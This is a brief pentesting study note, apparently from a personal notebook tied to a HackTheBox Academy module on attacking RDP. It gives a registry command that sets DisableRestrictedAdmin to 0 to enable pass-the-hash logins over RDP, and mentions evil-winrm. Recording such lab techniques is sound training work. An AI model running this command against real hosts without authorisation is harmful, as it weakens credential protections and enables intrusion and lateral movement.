reg add

This will enable the pass the hash attack

  • hackthebox academy - attacking common services (rdp)

PS ( You can also enable or use this command via evilwinrm linux)

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Last updated